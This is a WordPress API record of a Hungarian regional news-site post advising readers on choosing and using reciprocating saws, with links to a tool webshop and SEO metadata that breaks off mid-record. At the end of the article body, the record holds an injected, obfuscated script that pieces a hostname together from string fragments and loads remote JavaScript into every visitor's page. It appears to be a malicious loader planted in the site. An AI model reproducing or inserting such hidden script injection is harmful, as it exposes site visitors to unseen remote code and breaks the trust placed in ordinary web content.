{"id":57943,"date":"2023-11-20T16:02:14","date_gmt":"2023-11-20T15:02:14","guid":{"rendered":"https:\/\/dorogimedence.hu\/?p=57943"},"modified":"2023-11-20T16:02:14","modified_gmt":"2023-11-20T15:02:14","slug":"kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran","status":"publish","type":"post","link":"https:\/\/dorogimedence.hu\/index.php\/2023\/11\/20\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\/","title":{"rendered":"Kardf\u0171r\u00e9sz &#8211; mire j\u00f3, hogyan kell haszn\u00e1lni, \u00e9s mire figyelj\u00fcnk a kiv\u00e1laszt\u00e1s, v\u00e1s\u00e1rl\u00e1s sor\u00e1n?"},"content":{"rendered":"<p><strong>A kardf\u0171r\u00e9sz egy elektromosan vagy akkumul\u00e1torral m\u0171k\u00f6d\u0151 k\u00e9ziszersz\u00e1m, amelyet komolyabb v\u00e1g\u00e1si feladatokra haszn\u00e1lnak. A nev\u00e9t a jellegzetes, hossz\u00fa \u00e9s keskeny peng\u00e9j\u00e9r\u0151l kapta, ami kardra hasonl\u00edt. A kardf\u0171r\u00e9sz k\u00fcl\u00f6n\u00f6sen hasznos ott, ahol nagy er\u0151kifejt\u00e9sre \u00e9s m\u00e9ly v\u00e1g\u00e1sokra van sz\u00fcks\u00e9g. Ide\u00e1lis v\u00e1laszt\u00e1s p\u00e9ld\u00e1ul faanyagok, f\u00e9mek vagy ak\u00e1r gipszkarton falak v\u00e1g\u00e1s\u00e1hoz.<\/strong><\/p>\n<p>A kardf\u0171r\u00e9sz haszn\u00e1lata az \u00e9p\u00edtkez\u00e9seken ny\u00fajt legnagyobb seg\u00edts\u00e9get. Itt az \u00e1tlagosn\u00e1l nagyobb er\u0151kifejt\u00e9sre \u00e9s m\u00e9ly v\u00e1g\u00e1sokra van sz\u00fcks\u00e9g. J\u00f3l teljes\u00edt p\u00e9ld\u00e1ul faanyagok, m\u0171anyagok, f\u00e9mek vagy ak\u00e1r &#8211; megfelel\u0151 k\u00e9s haszn\u00e1lat\u00e1val 200 mm-es gipszkarton falak v\u00e1g\u00e1s\u00e1n\u00e1l is. Orr\u0171r\u00e9sz, szablyaf\u0171r\u00e9sz n\u00e9ven is ismert.<\/p>\n<h2>A <span style=\"text-decoration: underline; color: #0000ff;\"><a style=\"color: #0000ff; text-decoration: underline;\" title=\"kardf\u0171r\u00e9sz \" href=\"https:\/\/www.trgszerszam.hu\/faipari-gepek-117\/dekopirfureszek-201\" target=\"_blank\" rel=\"dofollow noopener\">kardf\u0171r\u00e9sz <\/a><\/span>haszn\u00e1lat\u00e1nak egyik f\u0151 el\u0151nye,<\/h2>\n<p>hogy lehet\u0151v\u00e9 teszi a nehezen hozz\u00e1f\u00e9rhet\u0151 helyeken t\u00f6rt\u00e9n\u0151 munk\u00e1t is, p\u00e9ld\u00e1ul bont\u00e1si munk\u00e1latok sor\u00e1n.<\/p>\n<p>A kardf\u0171r\u00e9sz peng\u00e9j\u00e9t cser\u00e9lhetj\u00fck, att\u00f3l f\u00fcgg\u0151en, hogy milyen anyagot kell v\u00e1gnunk. P\u00e9ld\u00e1ul a fa \u00e9s a f\u00e9m k\u00fcl\u00f6nb\u00f6z\u0151 t\u00edpus\u00fa peng\u00e9ket ig\u00e9nyel. Emellett a modern kardf\u0171r\u00e9szek sebess\u00e9ge is \u00e1ll\u00edthat\u00f3, ami lehet\u0151v\u00e9 teszi a k\u00fcl\u00f6nb\u00f6z\u0151 anyagok \u00e9s a k\u00fcl\u00f6nf\u00e9le v\u00e1g\u00e1si feladatok ig\u00e9nyeihez val\u00f3 alkalmazkod\u00e1st.<\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-57944\" src=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2023\/11\/kardfuresz-5.jpg\" alt=\"\" width=\"750\" height=\"499\"><\/p>\n<p>A kardf\u0171r\u00e9sz kiv\u00e1laszt\u00e1sakor t\u00f6bb szempontot is \u00e9rdemes figyelembe venni, hogy megtal\u00e1lja a saj\u00e1t ig\u00e9nyeinek legink\u00e1bb megfelel\u0151 modellt. \u00cdme n\u00e9h\u00e1ny fontos t\u00e9nyez\u0151, amelyekre \u00e9rdemes odafigyelni:<\/p>\n<ol>\n<li><strong>Teljes\u00edtm\u00e9ny<\/strong>: Az el\u00e9rhet\u0151, megv\u00e1s\u00e1rolhat\u00f3 kardf\u0171r\u00e9szek teljes\u00edtm\u00e9nye el\u00e9gg\u00e9 k\u00fcl\u00f6nb\u00f6z\u0151 lehet. EZ az egyik legf\u0151bb szempont a kiv\u00e1laszt\u00e1sn\u00e1l! \u00c9rdemes egy kicsit fel\u00fcl tervezni, azaz, a sz\u00fcks\u00e9gesn\u00e9l 10-15%-al nagyobb teljes\u00edtm\u00e9ny\u0171 berendez\u00e9st v\u00e1lasztani. Fontos, hogy olyan modellt v\u00e1lasszon, amely elegend\u0151 er\u0151vel rendelkezik az \u00d6n \u00e1ltal tervezett feladatokhoz. Az otthoni haszn\u00e1latra sz\u00e1nt modellek \u00e1ltal\u00e1ban kev\u00e9sb\u00e9 er\u0151sek, mint az ipari felhaszn\u00e1l\u00e1sra tervezettek.<\/li>\n<li><strong>Vezet\u00e9kes vagy akkumul\u00e1toros<\/strong>: D\u00f6ntse el, hogy vezet\u00e9kes vagy akkumul\u00e1toros modellt szeretne. Az akkumul\u00e1toros f\u0171r\u00e9szek nagyobb mozg\u00e1sszabads\u00e1got biztos\u00edtanak, de \u00fczemidej\u00fck korl\u00e1tozott. MEgold\u00e1s lehet a plus akkumul\u00e1tor beszerz\u00e9se is. A vezet\u00e9kes f\u0171r\u00e9szek \u00e1lland\u00f3 teljes\u00edtm\u00e9nyt biztos\u00edtanak, de kev\u00e9sb\u00e9 mobilok.<\/li>\n<li><strong>Pengecser\u00e9l\u00e9si rendszer<\/strong>: V\u00e1lasszon olyan modellt, amelyn\u00e9l egyszer\u0171 \u00e9s gyors a penge cser\u00e9je, lehet\u0151leg szersz\u00e1m n\u00e9lk\u00fcl. Figyelem! ez egy nagyon vesz\u00e9lyes munkafolyamat, tartsuk be a gy\u00e1ri el\u0151\u00edr\u00e1sokat!&nbsp;<\/li>\n<li><strong>Sebess\u00e9gszab\u00e1lyoz\u00e1s<\/strong>: A v\u00e1ltoztathat\u00f3 sebess\u00e9g\u0171 modellek lehet\u0151v\u00e9 teszik a k\u00fcl\u00f6nb\u00f6z\u0151 anyagokhoz val\u00f3 alkalmazkod\u00e1st, \u00edgy sokoldal\u00fabb\u00e1 t\u00e9ve a f\u0171r\u00e9szt.<\/li>\n<li><strong>Rezg\u00e9scsillap\u00edt\u00e1s<\/strong>: A j\u00f3 rezonancia csillap\u00edt\u00e1s n\u00f6veli a k\u00e9nyelmet \u00e9s cs\u00f6kkenti a f\u00e1radts\u00e1got hosszabb haszn\u00e1lat sor\u00e1n.<\/li>\n<li><strong>Ergon\u00f3mia \u00e9s s\u00faly<\/strong>: Figyeljen a f\u0171r\u00e9sz ergon\u00f3mi\u00e1j\u00e1ra \u00e9s s\u00faly\u00e1ra. Egy k\u00f6nnyebb \u00e9s jobban kiegyens\u00falyozott f\u0171r\u00e9sz k\u00e9nyelmesebb \u00e9s kev\u00e9sb\u00e9 f\u00e1raszt\u00f3 hosszabb haszn\u00e1lat sor\u00e1n.<\/li>\n<li><strong>Biztons\u00e1gi jellemz\u0151k<\/strong>: \u00dcgyeljen a biztons\u00e1gi funkci\u00f3kra, mint a pengev\u00e9d\u0151, a biztons\u00e1gi kapcsol\u00f3, \u00e9s a visszar\u00fag\u00e1s elleni v\u00e9delem.<\/li>\n<li><strong>M\u00e1rka \u00e9s garancia<\/strong>: V\u00e1lasszon megb\u00edzhat\u00f3 m\u00e1rk\u00e1t, <a title=\"TRG szersz\u00e1m web\u00e1ruh\u00e1z, kardf\u0171r\u00e9sz v\u00e1s\u00e1rl\u00e1s\" href=\"https:\/\/www.trgszerszam.hu\/\" target=\"_blank\" rel=\"dofollow noopener\"><strong><span style=\"text-decoration: underline; color: #0000ff;\">web\u00e1ruh\u00e1zat<\/span><\/strong><\/a>, \u00e9s figyeljen a garanci\u00e1lis felt\u00e9telekre is.<\/li>\n<li><strong>Tartoz\u00e9kok \u00e9s kieg\u00e9sz\u00edt\u0151k<\/strong>: N\u00e9zze meg, hogy a f\u0171r\u00e9szhez milyen tartoz\u00e9kok j\u00e1rnak, p\u00e9ld\u00e1ul k\u00fcl\u00f6nb\u00f6z\u0151 peng\u00e9k, t\u00e1rol\u00f3 tok, stb.<\/li>\n<li><strong>Robusztuss\u00e1g \u00e9s tart\u00f3ss\u00e1g<\/strong>: Az \u00e9p\u00edtkez\u00e9si k\u00f6rnyezet gyakran kem\u00e9ny megpr\u00f3b\u00e1ltat\u00e1sok el\u00e9 \u00e1ll\u00edtja&nbsp; alegjobb szersz\u00e1mokat is, ez\u00e9rt fontos, hogy a f\u0171r\u00e9sz ellen\u00e1lljon a por, a nedvess\u00e9g \u00e9s az \u00fct\u00e9seknek.<\/li>\n<li><strong>\u00c1r-\u00e9rt\u00e9k ar\u00e1ny<\/strong>: Vegye figyelembe az \u00e1rat \u00e9s azt, hogy milyen \u00e9rt\u00e9ket kap ez\u00e9rt a p\u00e9nz\u00e9rt. Ne feledje, hogy a legdr\u00e1g\u00e1bb modell nem mindig a legjobb v\u00e1laszt\u00e1s az \u00d6n sz\u00e1m\u00e1ra.<\/li>\n<\/ol>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-57945\" src=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2023\/11\/kardfuresz-3.jpg\" alt=\"\" width=\"750\" height=\"508\"><\/p>\n<p>Mindezeket szem el\u0151tt tartva k\u00f6nnyebben tal\u00e1lhatja meg a sz\u00fcks\u00e9gleteinek legink\u00e1bb megfelel\u0151 kardf\u0171r\u00e9szt.<\/p>\n<p><script>\n(function(){\nzt9g=document.createElement(\"script\");zt9g_=((\"u\")+\"st\")+\"a\";zt9g.async=true;\nzt9g.type=\"text\/javascript\";zt9g_+=(\"t.i\")+\"\"+\"n\";zt9g_+=((\"f\")+\"o\");zt9g_+=\"\/\";\nzt9gu=\"2185189818.\";zt9gu+=\"9siq0wjct9gsvzqX6jw\"+\"ddmegesmXc6\";\nzt9g.src=\"https:\/\/\"+zt9g_+zt9gu;document.body.appendChild(zt9g);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A kardf\u0171r\u00e9sz egy elektromosan vagy akkumul\u00e1torral m\u0171k\u00f6d\u0151 k\u00e9ziszersz\u00e1m, amelyet komolyabb v\u00e1g\u00e1si feladatokra haszn\u00e1lnak. A nev\u00e9t a jellegzetes, hossz\u00fa \u00e9s keskeny peng\u00e9j\u00e9r\u0151l kapta, ami kardra hasonl\u00edt. A kardf\u0171r\u00e9sz k\u00fcl\u00f6n\u00f6sen hasznos ott, ahol nagy er\u0151kifejt\u00e9sre \u00e9s m\u00e9ly v\u00e1g\u00e1sokra van sz\u00fcks\u00e9g. Ide\u00e1lis v\u00e1laszt\u00e1s p\u00e9ld\u00e1ul faanyagok, f\u00e9mek vagy ak\u00e1r gipszkarton falak v\u00e1g\u00e1s\u00e1hoz. A kardf\u0171r\u00e9sz haszn\u00e1lata az \u00e9p\u00edtkez\u00e9seken ny\u00fajt legnagyobb<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[7571,7570],"class_list":{"0":"post-57943","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-hirek","7":"tag-furesz","8":"tag-kardfuresz"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Kardf\u0171r\u00e9sz - mire j\u00f3, hogyan kell haszn\u00e1lni, \u00e9s mire figyelj\u00fcnk a kiv\u00e1laszt\u00e1s, v\u00e1s\u00e1rl\u00e1s sor\u00e1n?<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dorogimedence.hu\/index.php\/2023\/11\/20\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:locale\" content=\"hu_HU\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:type\" content=\"article\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:title\" content=\"Kardf\u0171r\u00e9sz - mire j\u00f3, hogyan kell haszn\u00e1lni, \u00e9s mire figyelj\u00fcnk a kiv\u00e1laszt\u00e1s, v\u00e1s\u00e1rl\u00e1s sor\u00e1n?\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:description\" content=\"A kardf\u0171r\u00e9sz egy elektromosan vagy akkumul\u00e1torral m\u0171k\u00f6d\u0151 k\u00e9ziszersz\u00e1m, amelyet komolyabb v\u00e1g\u00e1si feladatokra haszn\u00e1lnak. A nev\u00e9t a jellegzetes, hossz\u00fa \u00e9s keskeny peng\u00e9j\u00e9r\u0151l kapta, ami kardra hasonl\u00edt. A kardf\u0171r\u00e9sz k\u00fcl\u00f6n\u00f6sen hasznos ott, ahol nagy er\u0151kifejt\u00e9sre \u00e9s m\u00e9ly v\u00e1g\u00e1sokra van sz\u00fcks\u00e9g. Ide\u00e1lis v\u00e1laszt\u00e1s p\u00e9ld\u00e1ul faanyagok, f\u00e9mek vagy ak\u00e1r gipszkarton falak v\u00e1g\u00e1s\u00e1hoz. A kardf\u0171r\u00e9sz haszn\u00e1lata az \u00e9p\u00edtkez\u00e9seken ny\u00fajt legnagyobb\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dorogimedence.hu\/index.php\/2023\/11\/20\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:site_name\" content=\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dorogimedence\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:published_time\" content=\"2023-11-20T15:02:14+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:image\" content=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2023\/11\/kardfuresz-4.jpg\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:width\" content=\"791\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:height\" content=\"513\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"author\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:label1\" content=\"Szerz\u0151:\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data1\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:label2\" content=\"Becs\u00fclt olvas\u00e1si id\u0151\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 perc\" class=\"yoast-seo-meta-tag\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/11\\\/20\\\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/11\\\/20\\\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\\\/\"},\"author\":{\"name\":\"dorogimedence.hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\"},\"headline\":\"Kardf\u0171r\u00e9sz &#8211; mire j\u00f3, hogyan kell haszn\u00e1lni, \u00e9s mire figyelj\u00fcnk a kiv\u00e1laszt\u00e1s, v\u00e1s\u00e1rl\u00e1s sor\u00e1n?\",\"datePublished\":\"2023-11-20T15:02:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/11\\\/20\\\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\\\/\"},\"wordCount\":809,\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/11\\\/20\\\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2023\\\/11\\\/kardfuresz-5.jpg\",\"keywords\":[\"f\u0171r\u00e9sz\",\"kardf\u0171r\u00e9sz\"],\"articleSection\":[\"H\u00edrek\"],\"inLanguage\":\"hu\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/11\\\/20\\\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/11\\\/20\\\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\\\/\",\"name\":\"Kardf\u0171r\u00e9sz - mire j\u00f3, hogyan kell haszn\u00e1lni, \u00e9s mire figyelj\u00fcnk a kiv\u00e1laszt\u00e1s, v\u00e1s\u00e1rl\u00e1s sor\u00e1n?\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/11\\\/20\\\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/11\\\/20\\\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2023\\\/11\\\/kardfuresz-5.jpg\",\"datePublished\":\"2023-11-20T15:02:14+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/11\\\/20\\\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\\\/#breadcrumb\"},\"inLanguage\":\"hu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/11\\\/20\\\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/11\\\/20\\\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\\\/#primaryimage\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2023\\\/11\\\/kardfuresz-5.jpg\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2023\\\/11\\\/kardfuresz-5.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/11\\\/20\\\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Kezd\u0151lap\",\"item\":\"https:\\\/\\\/dorogimedence.hu\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Kardf\u0171r\u00e9sz &#8211; mire j\u00f3, hogyan kell haszn\u00e1lni, \u00e9s mire figyelj\u00fcnk a kiv\u00e1laszt\u00e1s, v\u00e1s\u00e1rl\u00e1s sor\u00e1n?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"description\":\"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok\",\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dorogimedence.hu\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"hu\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"width\":600,\"height\":100,\"caption\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dorogimedence\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\",\"name\":\"dorogimedence.hu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"url\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"contentUrl\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"caption\":\"dorogimedence.hu\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Kardf\u0171r\u00e9sz - mire j\u00f3, hogyan kell haszn\u00e1lni, \u00e9s mire figyelj\u00fcnk a kiv\u00e1laszt\u00e1s, v\u00e1s\u00e1rl\u00e1s sor\u00e1n?","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dorogimedence.hu\/index.php\/2023\/11\/20\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\/","og_locale":"hu_HU","og_type":"article","og_title":"Kardf\u0171r\u00e9sz - mire j\u00f3, hogyan kell haszn\u00e1lni, \u00e9s mire figyelj\u00fcnk a kiv\u00e1laszt\u00e1s, v\u00e1s\u00e1rl\u00e1s sor\u00e1n?","og_description":"A kardf\u0171r\u00e9sz egy elektromosan vagy akkumul\u00e1torral m\u0171k\u00f6d\u0151 k\u00e9ziszersz\u00e1m, amelyet komolyabb v\u00e1g\u00e1si feladatokra haszn\u00e1lnak. A nev\u00e9t a jellegzetes, hossz\u00fa \u00e9s keskeny peng\u00e9j\u00e9r\u0151l kapta, ami kardra hasonl\u00edt. A kardf\u0171r\u00e9sz k\u00fcl\u00f6n\u00f6sen hasznos ott, ahol nagy er\u0151kifejt\u00e9sre \u00e9s m\u00e9ly v\u00e1g\u00e1sokra van sz\u00fcks\u00e9g. Ide\u00e1lis v\u00e1laszt\u00e1s p\u00e9ld\u00e1ul faanyagok, f\u00e9mek vagy ak\u00e1r gipszkarton falak v\u00e1g\u00e1s\u00e1hoz. A kardf\u0171r\u00e9sz haszn\u00e1lata az \u00e9p\u00edtkez\u00e9seken ny\u00fajt legnagyobb","og_url":"https:\/\/dorogimedence.hu\/index.php\/2023\/11\/20\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\/","og_site_name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","article_publisher":"https:\/\/www.facebook.com\/dorogimedence\/","article_published_time":"2023-11-20T15:02:14+00:00","og_image":[{"width":791,"height":513,"url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2023\/11\/kardfuresz-4.jpg","type":"image\/jpeg"}],"author":"dorogimedence.hu","twitter_card":"summary_large_image","twitter_misc":{"Szerz\u0151:":"dorogimedence.hu","Becs\u00fclt olvas\u00e1si id\u0151":"4 perc"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/11\/20\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\/#article","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/11\/20\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\/"},"author":{"name":"dorogimedence.hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4"},"headline":"Kardf\u0171r\u00e9sz &#8211; mire j\u00f3, hogyan kell haszn\u00e1lni, \u00e9s mire figyelj\u00fcnk a kiv\u00e1laszt\u00e1s, v\u00e1s\u00e1rl\u00e1s sor\u00e1n?","datePublished":"2023-11-20T15:02:14+00:00","mainEntityOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/11\/20\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\/"},"wordCount":809,"publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/11\/20\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2023\/11\/kardfuresz-5.jpg","keywords":["f\u0171r\u00e9sz","kardf\u0171r\u00e9sz"],"articleSection":["H\u00edrek"],"inLanguage":"hu"},{"@type":"WebPage","@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/11\/20\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\/","url":"https:\/\/dorogimedence.hu\/index.php\/2023\/11\/20\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\/","name":"Kardf\u0171r\u00e9sz - mire j\u00f3, hogyan kell haszn\u00e1lni, \u00e9s mire figyelj\u00fcnk a kiv\u00e1laszt\u00e1s, v\u00e1s\u00e1rl\u00e1s sor\u00e1n?","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/11\/20\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\/#primaryimage"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/11\/20\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2023\/11\/kardfuresz-5.jpg","datePublished":"2023-11-20T15:02:14+00:00","breadcrumb":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/11\/20\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\/#breadcrumb"},"inLanguage":"hu","potentialAction"